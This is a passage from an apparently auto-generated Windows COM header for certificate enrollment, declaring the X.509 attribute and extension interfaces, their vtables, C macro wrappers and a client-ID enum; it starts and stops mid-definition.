        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Policies )( 
            __RPC__in IX509ExtensionMSApplicationPolicies * This,
            /* [retval][out] */ __RPC__deref_out_opt ICertificatePolicies **ppValue);
        
        END_INTERFACE
    } IX509ExtensionMSApplicationPoliciesVtbl;

    interface IX509ExtensionMSApplicationPolicies
    {
        CONST_VTBL struct IX509ExtensionMSApplicationPoliciesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509ExtensionMSApplicationPolicies_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509ExtensionMSApplicationPolicies_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509ExtensionMSApplicationPolicies_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509ExtensionMSApplicationPolicies_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509ExtensionMSApplicationPolicies_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509ExtensionMSApplicationPolicies_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509ExtensionMSApplicationPolicies_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509ExtensionMSApplicationPolicies_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509ExtensionMSApplicationPolicies_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509ExtensionMSApplicationPolicies_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#define IX509ExtensionMSApplicationPolicies_get_Critical(This,pValue)	\
    ( (This)->lpVtbl -> get_Critical(This,pValue) ) 

#define IX509ExtensionMSApplicationPolicies_put_Critical(This,Value)	\
    ( (This)->lpVtbl -> put_Critical(This,Value) ) 


#define IX509ExtensionMSApplicationPolicies_InitializeEncode(This,pValue)	\
    ( (This)->lpVtbl -> InitializeEncode(This,pValue) ) 

#define IX509ExtensionMSApplicationPolicies_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509ExtensionMSApplicationPolicies_get_Policies(This,ppValue)	\
    ( (This)->lpVtbl -> get_Policies(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509ExtensionMSApplicationPolicies_INTERFACE_DEFINED__ */


#ifndef __IX509Attribute_INTERFACE_DEFINED__
#define __IX509Attribute_INTERFACE_DEFINED__

/* interface IX509Attribute */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509Attribute;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab322-217d-11da-b2a4-000e7bbb2b09")
    IX509Attribute : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ObjectId( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RawData( 
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509AttributeVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509Attribute * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509Attribute * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509Attribute * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509Attribute * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509Attribute * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509Attribute * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509Attribute * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509Attribute * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509Attribute * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509Attribute * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509AttributeVtbl;

    interface IX509Attribute
    {
        CONST_VTBL struct IX509AttributeVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509Attribute_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509Attribute_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509Attribute_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509Attribute_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509Attribute_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509Attribute_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509Attribute_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509Attribute_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509Attribute_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509Attribute_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509Attribute_INTERFACE_DEFINED__ */


#ifndef __IX509Attributes_INTERFACE_DEFINED__
#define __IX509Attributes_INTERFACE_DEFINED__

/* interface IX509Attributes */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509Attributes;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab323-217d-11da-b2a4-000e7bbb2b09")
    IX509Attributes : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509Attribute **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt IX509Attribute *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509AttributesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509Attributes * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509Attributes * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509Attributes * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509Attributes * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509Attributes * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509Attributes * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509Attributes * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in IX509Attributes * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509Attribute **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in IX509Attributes * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in IX509Attributes * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in IX509Attributes * This,
            /* [in] */ __RPC__in_opt IX509Attribute *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in IX509Attributes * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in IX509Attributes * This);
        
        END_INTERFACE
    } IX509AttributesVtbl;

    interface IX509Attributes
    {
        CONST_VTBL struct IX509AttributesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509Attributes_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509Attributes_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509Attributes_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509Attributes_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509Attributes_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509Attributes_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509Attributes_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509Attributes_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define IX509Attributes_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define IX509Attributes_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define IX509Attributes_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define IX509Attributes_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define IX509Attributes_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509Attributes_INTERFACE_DEFINED__ */


#ifndef __IX509AttributeExtensions_INTERFACE_DEFINED__
#define __IX509AttributeExtensions_INTERFACE_DEFINED__

/* interface IX509AttributeExtensions */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509AttributeExtensions;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab324-217d-11da-b2a4-000e7bbb2b09")
    IX509AttributeExtensions : public IX509Attribute
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ __RPC__in_opt IX509Extensions *pExtensions) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_X509Extensions( 
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509AttributeExtensionsVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509AttributeExtensions * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509AttributeExtensions * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509AttributeExtensions * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [in] */ __RPC__in_opt IX509Extensions *pExtensions);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_X509Extensions )( 
            __RPC__in IX509AttributeExtensions * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509Extensions **ppValue);
        
        END_INTERFACE
    } IX509AttributeExtensionsVtbl;

    interface IX509AttributeExtensions
    {
        CONST_VTBL struct IX509AttributeExtensionsVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509AttributeExtensions_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509AttributeExtensions_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509AttributeExtensions_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509AttributeExtensions_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509AttributeExtensions_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509AttributeExtensions_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509AttributeExtensions_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509AttributeExtensions_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509AttributeExtensions_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509AttributeExtensions_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509AttributeExtensions_InitializeEncode(This,pExtensions)	\
    ( (This)->lpVtbl -> InitializeEncode(This,pExtensions) ) 

#define IX509AttributeExtensions_InitializeDecode(This,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> InitializeDecode(This,Encoding,strEncodedData) ) 

#define IX509AttributeExtensions_get_X509Extensions(This,ppValue)	\
    ( (This)->lpVtbl -> get_X509Extensions(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509AttributeExtensions_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0040 */
/* [local] */ 

typedef 
enum RequestClientInfoClientId
    {
        ClientIdNone	= 0,
        ClientIdXEnroll2003	= 1,
        ClientIdAutoEnroll2003	= 2,
        ClientIdWizard2003	= 3,
        ClientIdCertReq2003	= 4,
        ClientIdDefaultRequest	= 5,
        ClientIdAutoEnroll	= 6,
        ClientIdRequestWizard	= 7,
        ClientIdEOBO	= 8,
        ClientIdCertReq	= 9,
        ClientIdTest	= 10,
        ClientIdWinRT	= 11,
        ClientIdUserStart	= 1000
    } 	RequestClientInfoClientId;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0040_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0040_v0_0_s_ifspec;

#ifndef __IX509AttributeClientId_INTERFACE_DEFINED__
#define __IX509AttributeClientId_INTERFACE_DEFINED__

/* interface IX509AttributeClientId */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509AttributeClientId;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab325-217d-11da-b2a4-000e7bbb2b09")
    IX509AttributeClientId : public IX509Attribute
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE InitializeEncode( 
            /* [in] */ RequestClientInfoClientId ClientId,
            /* [in] */ __RPC__in BSTR strMachineDnsName,
            /* [in] */ __RPC__in BSTR strUserSamName,
            /* [in] */ __RPC__in BSTR strProcessName) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeDecode( 
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ClientId( 
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_MachineDnsName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_UserSamName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ProcessName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509AttributeClientIdVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509AttributeClientId * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509AttributeClientId * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509AttributeClientId * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509AttributeClientId * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509AttributeClientId * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509AttributeClientId * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509AttributeClientId * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509AttributeClientId * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ObjectId )( 
            __RPC__in IX509AttributeClientId * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509AttributeClientId * This,
            /* [in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeEncode )( 
            __RPC__in IX509AttributeClientId * This,
            /* [in] */ RequestClientInfoClientId ClientId,
            /* [in] */ __RPC__in BSTR strMachineDnsName,
            /* [in] */ __RPC__in BSTR strUserSamName,
            /* [in] */ __RPC__in BSTR strProcessName);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeDecode )( 
            __RPC__in IX509AttributeClientId * This,
            /* [in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR strEncodedData);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509AttributeClientId * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_MachineDnsName )( 
            __RPC__in IX509AttributeClientId * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UserSamName )( 
            __RPC__in IX509AttributeClientId * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ProcessName )( 
            __RPC__in IX509AttributeClientId * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509AttributeClientIdVtbl;

    interface IX509AttributeClientId
    {
        CONST_VTBL struct IX509AttributeClientIdVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509AttributeClientId_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509AttributeClientId_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509AttributeClientId_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509AttributeClientId_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509AttributeClientId_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509AttributeClientId_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509AttributeClientId_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509AttributeClientId_Initialize(This,pObjectId,Encoding,strEncodedData)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,Encoding,strEncodedData) ) 

#define IX509AttributeClientId_get_ObjectId(This,ppValue)	\
    ( (This)->lpVtbl -> get_ObjectId(This,ppValue) ) 

#define IX509AttributeClientId_get_RawData(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_RawData(This,Encoding,pValue) ) 


#define IX509AttributeClientId_InitializeEncode(This,ClientId,strMachineDnsName,strUserSamName,strProcessName)	\
    ( (This)->lpVtbl -> InitializeEncode(This,ClientId,strMachineDnsName,strUserSamName,strProcessName) ) 

#define IX509AttributeClientId_InitializeDecode(This,Encoding,strEncodedData)	\
